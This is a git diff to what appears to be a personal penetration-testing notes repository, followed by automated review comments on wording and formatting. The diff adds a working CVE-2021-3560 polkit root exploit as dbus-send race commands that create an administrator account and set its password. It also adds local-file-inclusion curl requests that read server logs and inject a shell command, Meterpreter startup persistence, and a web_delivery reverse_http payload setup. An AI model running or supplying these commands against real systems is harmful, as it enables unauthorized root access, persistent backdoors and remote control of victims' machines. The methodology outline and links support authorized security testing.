diff --git a/exploit/linux/polkit.md b/exploit/linux/polkit.md new file mode 100644 index 0000000..7dcdba8 --- /dev/null +++ b/exploit/linux/polkit.md @@ -0,0 +1,24 @@ +# CVE-2021-3560 + +* Exploit `< 0.105-26ubuntu1.1` + + +## Racing Condition +* Request creation of account via dbus message and `pkexec`. sleep time is variable. +```sh +dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $! +``` + * Create password via `openssl passwd -6 -salt salt password123` +```sh +dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $! +``` +* Request is killed after polkits receives it + +* Polkit requests uid of user who sent the message, which has been deleted +* Error will be thrown +* Uid turns to root afterwards +* Request succeeds + +* `su user1` and `sudo -s` + + diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index a292a04..83be44f 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -1,6 +1,8 @@ # Local File Inclusion To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed. +* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/) + ## Usage * Exploit URL parameter by including other files. @@ -28,3 +30,4 @@ curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ```HTTP curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' ``` + 
diff --git a/pentesting.md b/pentesting.md index c9ac379..c1026ba 100644 --- a/pentesting.md +++ b/pentesting.md @@ -1,4 +1,11 @@ -# Methodology +# Pentesting +Authorized audit of security systems of computers and networks. +* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) + * Permissions + * Scope + * Rules + +## Methodology * Steps * Reconnaissance @@ -8,7 +15,7 @@ * Covering Tracks * Reporting -## Reconnaissance +### Reconnaissance * Duck / SearX / metacrawler / google * Wikipedia * [Shodan.io](http://www.shodan.io) @@ -19,7 +26,7 @@ * builtwith.com * wappalyzer -## Enumeration +### Enumeration * nmap * nikto * gobuster @@ -27,16 +34,24 @@ * metasploit * enum4linux / linpeas / winpeas / linenum -## Exploitation +### Exploitation -## Privilege Escalation +### Post Exploitation +* Pivoting +#### Privilege Escalation +* Vertically or horizontally -## Covering Tracks +#### Covering Tracks -## Reporting +#### Reporting * Includes * Vulnerabilities * Criticality * Description * Countermeasures * Finding summary + +## Frameworks +* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf) +* [NIST](https://www.nist.gov/cyberframework) +* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance) diff --git a/persistence/meterpreter.md b/persistence/meterpreter.md new file mode 100644 index 0000000..e13b02c --- /dev/null +++ b/persistence/meterpreter.md @@ -0,0 +1,6 @@ +# Meterpreter Persistence + +## Load shell on system startup +```sh +run persistence -X +``` diff --git a/post_exploitation/docs/metasploit.md b/post_exploitation/docs/metasploit.md index 414fb9d..5de49ff 100644 --- a/post_exploitation/docs/metasploit.md +++ b/post_exploitation/docs/metasploit.md @@ -48,3 +48,13 @@ run post/windows/gather/hashdump load kiwi lsa_dump_sam ``` + +### Webdelivery +```sh +use exploit/multi/script/web_delivery +show targets +set LPORT +set PAYLOAD windows/meterpreter/reverse_http +run -j +``` +* Copy into powershell/cmd 
diff --git a/reverse_shells/docs/prep b/reverse_shells/docs/prep new file mode 100644 index 0000000..c7e911e Binary files /dev/null and b/reverse_shells/docs/prep differ
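Review bot: in `exploit/linux/polkit.md` the bullet `* Exploit \`< 0.105-26ubuntu1.1\`` reads as a version of the exploit when it is the affected polkit package range; label it as such (`* Affected: polkit < 0.105-26ubuntu1.1`) and add the matching mitigation line (upgrade to 0.105-26ubuntu1.1 or later) so the note is also usable on the defensive side. Three smaller points in the same hunk: the heading `## Racing Condition` should read `## Race Condition`; `polkits` in `Request is killed after polkits receives it` should be `polkit`; and the indented ` * Create password via ...` bullet is followed by a fence at column 0, which terminates the list in Markdown, so either unindent the bullet or indent the fence to match. The `SetPassword` call also hard-codes the object path `/org/freedesktop/Accounts/User1000`; state that this path depends on the uid assigned to `user1`, since a reader will otherwise assume it is fixed.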
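Review bot: the link added to `exploit/web/local_file_inclusion.md` as `[Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)` points at a page about remote file inclusion, yet it is placed in the Local File Inclusion document with no indication of that; either relabel it (`Acunetix article on RFI`) or move it to an RFI note. The second hunk in this file (`@@ -28,3 +30,4 @@`) only appends a line containing a single space after the closing fence; that is trailing whitespace rather than an intentional blank line and should be dropped.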
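Review bot: in the first `pentesting.md` hunk, `Authorized audit of security systems of computers and networks.` is a fragment and reads awkwardly; `Authorized security assessment of computer systems and networks.` keeps the meaning. The `Rules of Engagement -- Cheat Sheet` entry links an Egnyte share URL ending in `/?`, which is a file-sharing handle rather than a stable reference; link the canonical SANS page for the cheat sheet, or at least record the access date so a dead link can be traced.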
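Review bot: the `@@ -27,16 +34,24 @@` hunk in `pentesting.md` demotes `Privilege Escalation`, `Covering Tracks` and `Reporting` to `####` under the new `### Post Exploitation`, but the `* Steps` list under `## Methodology` (context lines `* Covering Tracks`, `* Reporting`) was not updated to include Post Exploitation, so the outline and the headings no longer agree. `### Exploitation` is left as an empty section; add a bullet or a placeholder so it does not render as a bare heading. Under `## Frameworks`, the `NIST` entry links the Cybersecurity Framework, which is a risk-management framework rather than a testing methodology like OSSTMM3; label it `NIST CSF` so the three entries are not read as interchangeable pentest methodologies.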
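Review bot: `persistence/meterpreter.md` lists `run persistence -X` with no explanation of what `-X` does, what privilege level the session needs for it, or what artefact it leaves on the host, so the entry cannot be read without the script's help output; add a one-line description under the `## Load shell on system startup` heading. The `persistence` Meterpreter script is also deprecated in current Metasploit releases, so record the Metasploit version this was verified against.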
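Review bot: in the `post_exploitation/docs/metasploit.md` hunk, `set LPORT` has no value, so the listener port is never configured as written; use a placeholder such as `set LPORT <port>`. `show targets` is listed but no `set target` follows it, and the closing bullet `Copy into powershell/cmd` depends on which target was selected, so the step is ambiguous; either show the `set target` line or state in the bullet that the generated one-liner corresponds to the chosen target. The heading `### Webdelivery` should be `### Web Delivery` to match the module name `web_delivery`.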
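Review bot: `reverse_shells/docs/prep` is committed as a binary file with no extension and no description, so nothing in the diff says what it is or why it belongs in a documentation directory; replace it with its text source, or give it a recognizable extension and a line in the surrounding docs, or leave it out of the commit.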